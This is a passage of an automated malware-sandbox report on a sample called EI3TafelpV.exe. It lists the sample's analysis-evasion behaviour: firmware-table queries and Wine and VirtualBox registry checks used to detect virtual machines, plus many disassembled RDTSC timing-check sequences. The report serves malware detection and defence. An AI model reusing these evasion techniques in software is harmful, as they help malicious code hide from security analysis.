                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3EE12 second address: F3EE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C800543h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F55C92 second address: F55CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jg 00007F022CCCFB0Eh 0x0000000d jne 00007F022CCCFB1Dh 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F022CCCFB14h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F55CDC second address: F55CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F560A3 second address: F560A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5622C second address: F5623E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jng 00007F022C800536h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5623E second address: F5624A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F022CCCFB0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5651B second address: F56548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F022C800548h 0x0000000b jmp 00007F022C80053Eh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F56548 second address: F5654D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5654D second address: F5656C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F022C800545h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F59DF4 second address: F59E4C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F022CCCFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F022CCCFB08h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dx, EDEEh 0x0000002c push 00000000h 0x0000002e jmp 00007F022CCCFB11h 0x00000033 movzx ecx, di 0x00000036 call 00007F022CCCFB09h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F022CCCFB08h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F59E4C second address: F59E80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F022C800546h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F59E80 second address: F59EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F022CCCFB14h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F59EBB second address: F59EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F59F68 second address: F59F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5A0A6 second address: F5A0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F022C800536h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F5A0B1 second address: F5A0B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7A519 second address: F7A51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7A51D second address: F7A562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB16h 0x00000007 jmp 00007F022CCCFB13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F022CCCFB0Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7A562 second address: F7A566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7A566 second address: F7A56C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F4E280 second address: F4E28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F4E28A second address: F4E28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F788E0 second address: F788E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F788E5 second address: F788F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F022CCCFB06h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F788F5 second address: F78906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F78B96 second address: F78BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB19h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F022CCCFB0Eh 0x00000012 jo 00007F022CCCFB08h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F78BCC second address: F78BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F78F8F second address: F78FCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F022CCCFB0Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e je 00007F022CCCFB06h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push edi 0x00000018 jg 00007F022CCCFB06h 0x0000001e jmp 00007F022CCCFB12h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F78FCD second address: F78FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7928D second address: F792AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pushad 0x00000009 jnc 00007F022CCCFB12h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F792AC second address: F792BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C80053Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F79417 second address: F7941D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F40900 second address: F40904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F40904 second address: F4090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F4090C second address: F40913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F40913 second address: F40923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F022CCCFB06h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F79DB3 second address: F79DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F79DB7 second address: F79DD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F022CCCFB06h 0x00000010 jmp 00007F022CCCFB11h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F79DD8 second address: F79DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F79DDC second address: F79DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7A348 second address: F7A34E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F4400C second address: F44018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F022CCCFB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F44018 second address: F4401C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7EEE6 second address: F7EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7EF7D second address: F7EFD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F022C800549h 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 pushad 0x00000013 jbe 00007F022C800536h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop eax 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F022C80053Eh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F022C800544h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F45B42 second address: F45B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F022CCCFB10h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F45B59 second address: F45B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F022C800536h 0x0000000a jmp 00007F022C800541h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3B866 second address: F3B86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3B86A second address: F3B874 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3B874 second address: F3B87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3B87C second address: F3B886 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F022C800536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3B886 second address: F3B88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F88A47 second address: F88A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F88A4D second address: F88A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F38241 second address: F38245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F38245 second address: F38259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F022CCCFB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F022CCCFB0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F87F82 second address: F87F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F880D6 second address: F880DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F880DF second address: F880E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F880E7 second address: F880EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F88599 second address: F8859D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F88711 second address: F88715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F88842 second address: F8886B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F022C80053Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F022C800547h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8886B second address: F88884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8948F second address: F89495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F89D4F second address: F89D6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F022CCCFB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F89D6A second address: F89D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnp 00007F022C800536h 0x00000010 jnp 00007F022C800536h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F022C800541h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8A068 second address: F8A079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8A128 second address: F8A12D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8A2EF second address: F8A2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8A2F3 second address: F8A30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push eax 0x00000008 mov dword ptr [ebp+122D348Fh], eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 jnl 00007F022C80053Eh 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8A8D1 second address: F8A8EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8B2F4 second address: F8B2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8B2F8 second address: F8B2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8CFBF second address: F8CFC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8DB58 second address: F8DB69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F022CCCFB0Eh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8D864 second address: F8D869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8E763 second address: F8E780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB18h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8E780 second address: F8E78A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F022C800536h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8E78A second address: F8E78E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8F331 second address: F8F3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F022C800542h 0x0000000d jl 00007F022C800536h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F022C800538h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 movsx edi, bx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F022C800538h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xchg eax, ebx 0x00000054 push ecx 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8F3A5 second address: F8F3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ecx 0x00000008 jbe 00007F022CCCFB0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8FCE9 second address: F8FCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F929BE second address: F929D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB12h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F931BE second address: F931E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F022C800547h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
